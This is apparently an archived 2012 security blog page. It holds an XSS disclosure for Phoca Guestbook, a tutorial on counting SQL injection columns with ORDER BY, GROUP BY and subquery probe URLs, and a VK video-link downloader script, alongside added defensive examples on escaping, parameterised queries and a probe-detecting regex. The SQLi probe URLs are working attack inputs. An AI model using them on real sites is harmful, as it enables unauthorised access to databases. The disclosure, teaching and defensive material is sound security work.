Wednesday, November 28, 2012

Phoca Guestbook XSS

Found an XSS, and possibly a permanent (stored) and blind XSS.
Reported it to the right person, and they released an updated version that fixes the issue.

Get the updated version here

Steps to reproduce the bug:
Fill in the message/comment box. Each form is vulnerable to XSS.


The XSS payload is stored successfully. If the comment/message needs approval from an admin, a direct payload can be used to get the admin's cookies; this variant of the attack is known as Blind XSS.
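The fix for a stored guestbook XSS is contextual output encoding wherever the submission is written into HTML, and the blind variant above shows why the admin moderation view needs exactly the same treatment as the public page. The following is an added illustration of that, not code from Phoca Guestbook or from the author of this post; the entries and the field names are constructed for the example.

```python
import html

# Constructed sample guestbook entries. The first carries a harmless
# script-tag marker of the kind a tester would submit; nothing here comes
# from the real extension.
ENTRIES = [
    {"name": "tester", "message": "<script>alert(1)</script>", "approved": False},
    {"name": "alice", "message": "Nice site! <3", "approved": True},
]


def render_entry(entry):
    """Escape every untrusted field at the point it is written into HTML.

    html.escape turns < > & " ' into entities, so a stored payload is
    displayed as text instead of being parsed as markup. Escaping on output
    also covers entries that were stored before the fix was deployed.
    """
    return "<li><b>%s</b>: %s</li>" % (
        html.escape(entry["name"], quote=True),
        html.escape(entry["message"], quote=True),
    )


def render_public_page(entries):
    """Visitor-facing list: approved entries only."""
    items = "\n".join(render_entry(e) for e in entries if e["approved"])
    return "<ul>\n" + items + "\n</ul>"


def render_moderation_queue(entries):
    """Admin-facing list of entries awaiting approval.

    This view is what a stored, blind payload is aimed at: the admin opens
    the queue to approve or reject the entry, and the browser renders the
    payload in the admin's session. Requiring approval before publication is
    therefore not a defence on its own; the queue must escape too.
    """
    items = "\n".join(render_entry(e) for e in entries if not e["approved"])
    return "<ul>\n" + items + "\n</ul>"


if __name__ == "__main__":
    print(render_public_page(ENTRIES))
    print(render_moderation_queue(ENTRIES))
```

Both render paths share one escaping function on purpose: the moment a second, "internal" template renders the same stored text without it, the blind variant is back.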

Date reported : 25/10/2012
Date fixed : 21/11/2012
Date published : 29/11/2012

Thanks,
@yappare



Friday, November 23, 2012

Tuesday, November 20, 2012

Counting Columns in SQLi

Hi there.
As we already know, the most common way to count the number of columns in an SQL injection attack is with an ORDER BY query.
For example:

http://example.org/news.php?id=8 order by 5--
If the page loads normally, column 5 exists, so the number of columns is at least 5.

http://example.org/news.php?id=8 order by 6--
Otherwise, once the position exceeds the real column count, an error appears, and it usually looks like
Unknown column '6' in 'order clause'
From this we know the query has 5 columns and can proceed with the SQLi.

http://example.org/news.php?id=-8 union select 1,2,3,4,5--
And so on.

But if you encounter a scenario where you can't use ORDER BY, because of a WAF or some other reason, there are still ways to count the columns.

1 - Use a GROUP BY query

Similar to the ORDER BY technique, but instead of ORDER BY we use GROUP BY:

http://example.org/news.php?id=8 group by 5--
If the page loads normally, column 5 exists, so the number of columns is at least 5.

http://example.org/news.php?id=8 group by 6--
Otherwise, once the position exceeds the real column count, an error appears, and it usually looks like
Unknown column '6' in 'group statement'

Another way is to

2 - Set a condition such as (the main query) = (select 1)
For example,

http://example.org/news.php?id=8 and (select * from news)=(select 1)
Here we compare every column (using *) of the available table (news) against a single-column subquery,
and the error message reveals the number of columns, with a message such as
Operand should contain 5 column(s)
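All three counting tricks depend on two application defects at once: the parameter is spliced into the SQL text, and the database's own error message is echoed back to the client. The block below is an added example, not code from this post, that reproduces the ORDER BY, GROUP BY and row-comparison probes against a constructed 5-column `news` table in SQLite, shows the parameterised version that turns the same input into an inert literal, and flags the probes in constructed access-log lines. The table, the log lines and the error strings asserted on are SQLite's, not MySQL's, so the wording differs from the messages quoted above (SQLite reports "out of range" rather than "Unknown column", and its row-comparison error may not include the count at all).

```python
import re
import sqlite3

QUERY_COLUMNS = "id, title, body, author, posted"


def make_db():
    """Constructed in-memory stand-in for the table behind news.php?id=."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT)")
    conn.execute("INSERT INTO news VALUES (8, 'hello', 'world', 'yappare', '2012-11-20')")
    return conn


def vulnerable_lookup(conn, raw_id):
    """Anti-pattern: the request parameter is concatenated into the SQL and the
    raw database error is handed back, which is what lets ORDER BY n, GROUP BY n
    and (select * ...) = (select 1) reveal the column count."""
    sql = "SELECT %s FROM news WHERE id=%s" % (QUERY_COLUMNS, raw_id)
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def safe_lookup(conn, raw_id):
    """Hardened form: the value is bound as a parameter, so '8 order by 6--' is a
    string that matches no row, and only a generic error ever leaves the app."""
    sql = "SELECT %s FROM news WHERE id=?" % QUERY_COLUMNS
    try:
        return ("ok", conn.execute(sql, (raw_id,)).fetchall())
    except sqlite3.Error:
        # Log the detail server-side; the client never sees engine messages.
        return ("error", "request failed")


# Detection: the three probe shapes from the post, matched on URL-decoded requests.
PROBE = re.compile(
    r"(?:order|group)\s+by\s+\d+"
    r"|\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\(\s*select",
    re.IGNORECASE,
)

# Constructed access-log lines (already URL-decoded), not from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Nov/2012:10:01:02 +0000] "GET /news.php?id=8 HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Nov/2012:10:01:09 +0000] "GET /news.php?id=8 order by 6-- HTTP/1.1" 500 97',
    '10.0.0.5 - - [20/Nov/2012:10:01:15 +0000] "GET /news.php?id=8 and (select * from news)=(select 1) HTTP/1.1" 500 97',
]


def flag_probes(log_lines):
    """Return (line number, matched text) for every line carrying a column probe."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = PROBE.search(line)
        if m:
            hits.append((n, m.group(0)))
    return hits


if __name__ == "__main__":
    db = make_db()
    for payload in ["8 order by 5--", "8 order by 6--", "8 group by 6--",
                    "8 and (select * from news)=(select 1)"]:
        print("vulnerable:", repr(payload), "->", vulnerable_lookup(db, payload))
        print("safe      :", repr(payload), "->", safe_lookup(db, payload))
    print(flag_probes(SAMPLE_LOG))
```

A run of the probes against `vulnerable_lookup` shows the same pattern the post describes: position 5 succeeds, position 6 errors, and the error text is what leaks the count. Against `safe_lookup` every one of those inputs returns an empty result with no error, which is the behaviour a WAF rule can only approximate and parameter binding gives for free.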

Thanks,
@yappare a.k.a p0pc0rn

Monday, November 19, 2012

VKDownloader V2

Remember the first vkdownloader Python script? Look here: http://c0rni3sm.blogspot.com/2012/01/vkdownloader-python-script.html
It was quite messy. I'm not actually good at programming, still learning the basics. The old version won't work anymore and needed a little modification, so here I share with you all the second version of VKDownloader.
How to use it? Just like the old one :)


1 - You need Python on your PC
2 - Copy the video embed URL
3 - Run it with the command: python vkdownloader_v2.py "url"



#!/usr/bin/python
# Python 2 script (urllib2 and the print statement), as in the original post.

import sys, re, urllib2

if len(sys.argv) < 2:
    print """
## Usage : python vkdownloader_v2.py "Url" ##
-------------------------------------------------------------------------------------------
Example :
python vkdownloader_v2.py "http://vk.com/video_ext.php?oid=1111111&id=2222222&hash=4333333"
-------------------------------------------------------------------------------------------
## VK Downloader V2 by p0pc0rn 2012 ##
"""
    sys.exit(0)

url = sys.argv[1]

# The embed page carries the three values we need as JavaScript variables.
find_host = re.compile(r"var video_host = '(.*?)';")
find_uid = re.compile(r"var video_uid = '(.*?)';")
find_vtag = re.compile(r"var video_vtag = '(.*?)';")

# One request is enough; all three values come from the same page.
data = urllib2.urlopen(url).read()

host = find_host.search(data)
uid = find_uid.search(data)
vtag = find_vtag.search(data)

if not (host and uid and vtag):
    print 'Could not find video_host / video_uid / video_vtag in the page; has the embed format changed?'
    sys.exit(1)

# Build the direct link once and vary only the quality suffix.
base = host.group(1).replace("userapi.com", "vk.com") + 'u' + uid.group(1) + '/videos/' + vtag.group(1)

for quality in ('360', '480', '720'):
    print 'Download link for %sp => %s.%s.mp4' % (quality, base, quality)



Or simply get it here: http://pastebin.com/K3ht0Bc7

Friday, November 9, 2012